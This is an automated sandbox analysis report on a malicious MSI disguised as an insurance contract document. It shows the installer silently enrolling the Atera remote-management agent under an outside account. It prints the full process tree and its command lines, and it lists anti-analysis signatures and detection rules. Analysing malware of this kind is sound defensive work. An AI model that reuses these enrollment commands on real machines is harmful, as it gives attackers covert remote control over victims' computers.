Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documento_Contrato_Seguro_25105476.msi

Overview

General Information

Sample name:Documento_Contrato_Seguro_25105476.msi
Analysis ID:1576938
MD5:730547d4a223468fc2d62e952cac6ff7
SHA1:e5c8739f303913647d811a6f63749e9a66fbb70a
SHA256:8c4de817222fdc2f782d6012c1d11b10f5c270b88053c27c088e7cbda75936e5
Tags:msiuser-malrpt
Infos:

Detection

AteraAgent
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Installs Task Scheduler Managed Wrapper
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 4284 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Documento_Contrato_Seguro_25105476.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 648 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2316 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 857E432AFA5D0D205F28F10C61316F91 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 4304 cmdline: rundll32.exe "C:\Windows\Installer\MSI2E58.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4468656 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6812 cmdline: rundll32.exe "C:\Windows\Installer\MSI31B4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4469203 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 4320 cmdline: rundll32.exe "C:\Windows\Installer\MSI46E3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4474625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rundll32.exe (PID: 7344 cmdline: rundll32.exe "C:\Windows\Installer\MSI6CA1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4484296 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 1704 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 81F03F72FE72C18167CE907B2496F3F6 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 7124 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 4936 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 4320 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AteraAgent.exe (PID: 348 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="primepecasuti@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000OgujIIAR" /AgentId="ef8472c8-8ede-4877-a4a2-21e52a229933" MD5: 477293F80461713D51A98A24023D45E8)
    • msiexec.exe (PID: 3632 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 10B2694A2B9C11B571FDCBB60EE82DC9 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 5956 cmdline: rundll32.exe "C:\Windows\Installer\MSI77D8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4552734 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 1432 cmdline: rundll32.exe "C:\Windows\Installer\MSI7BC1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4553718 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
  • AteraAgent.exe (PID: 3396 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 7252 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7588 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "b2e2e8e1-1aa5-45e8-a3fe-897e9eed0f74" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7596 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "7fdf9479-5622-4845-acad-9b745ab412f6" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7768 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ccc76317-d528-48be-b707-c3302c03bc5e" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000OgujIIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7996 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "43d0d764-ddb0-4812-a25c-540c7752fdf7" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000OgujIIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)
      • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8132 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 7208 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageSTRemote.exe (PID: 2756 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "e2b0e7a4-c205-4ab0-a41f-defa03df179f" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000OgujIIAR MD5: 67FEF41237025021CD4F792E8C24E95A)
      • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMonitoring.exe (PID: 6252 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "435e53fd-9fe0-4f2b-90af-84e628f86498" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000OgujIIAR MD5: 5E3252E0248B484E76FCDBF8B42A645D)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AteraAgent.exe (PID: 7836 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 7924 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 432 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "03083ea1-baf1-4e78-a683-5c6842958609" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000OgujIIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5292 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 3236 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageUpgradeAgent.exe (PID: 7572 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "8156d760-c467-46e9-825a-383940c0c629" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000OgujIIAR MD5: E9794F785780945D2DDE78520B9BB59F)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 2128 cmdline: "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart MD5: E5DA170027542E25EDE42FC54C929077)
    • AgentPackageTicketing.exe (PID: 7732 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "756f8df8-494a-4cdb-9b3b-3f26b40ddc77" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000OgujIIAR MD5: DB1DB66EBD9B15B7DCD55374EA56EE5E)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageOsUpdates.exe (PID: 7812 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "3117f898-c24e-40df-9020-7a24bf326b25" agent-api.atera.com/Production 443 or8ixLi90Mf "getlistofallupdates" 001Q300000OgujIIAR MD5: CDE6BA86139AE458ABC24DAD31A66465)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageInternalPoller.exe (PID: 3940 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ff450401-d5c7-4b18-a355-4c1c5f3fd956" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000OgujIIAR MD5: 01807774F043028EC29982A62FA75941)
      • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageProgramManagement.exe (PID: 7284 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "bc07ae14-1fb3-4ad8-825a-cd1339068a47" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000OgujIIAR MD5: D6B7C686867602B045B64B932D752C10)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sppsvc.exe (PID: 6936 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 5772 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AgentPackageUpgradeAgent.exe (PID: 7676 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun MD5: E9794F785780945D2DDE78520B9BB59F)
    • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLogJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
    C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-17-2024 12_46_46-log.txtJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
      C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Windows\Temp\~DF369C3B750C2D1E54.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
          C:\Windows\Temp\~DFA4F603106DD881B4.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
            Click to see the 74 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000032.00000002.3050507203.000000E0F6AF1000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
              0000000C.00000002.1974508605.0000016E739F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                00000015.00000002.2185697606.00000280BA970000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                  00000029.00000002.2696202477.00000215A96B8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                    0000003C.00000002.3072832109.000002C38C029000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                      Click to see the 378 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      26.2.AteraAgent.exe.21b52848ca0.1.raw.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                        60.0.AgentPackageProgramManagement.exe.2c38b3b0000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                          50.2.AgentPackageTicketing.exe.277dfbd0000.2.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                            50.2.AgentPackageTicketing.exe.277dfbb0000.1.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                              50.2.AgentPackageTicketing.exe.277dfbb0000.1.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                Click to see the 16 entries

                                Sigma Signatures

                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 7208, ProcessName: cscript.exe
                                Sigma detected: Net.exe Execution
                                Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 81F03F72FE72C18167CE907B2496F3F6 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1704, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 7124, ProcessName: net.exe
                                Sigma detected: Stop Windows Service Via Net.EXE
                                Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 81F03F72FE72C18167CE907B2496F3F6 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1704, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 7124, ProcessName: net.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k smphost, CommandLine: C:\Windows\System32\svchost.exe -k smphost, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k smphost, ProcessId: 5772, ProcessName: svchost.exe

                                Suricata Signatures

                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: 442ad5.rbf (copy)ReversingLabs: Detection: 26%
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeReversingLabs: Detection: 26%
                                Multi AV Scanner detection for submitted file
                                Source: Documento_Contrato_Seguro_25105476.msiReversingLabs: Detection: 23%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.9% probability
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1894BC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,37_2_00007FFDF1894BC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1894DE0 CryptReleaseContext,37_2_00007FFDF1894DE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1894E20 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,37_2_00007FFDF1894E20
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA NetworksJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgentJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.configJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2778902999.00000000070F7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000025.00000002.2376501962.000001D73B702000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2773569098.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2770793562.0000000002C28000.00000004.00000020.00020000.00000000.sdmp
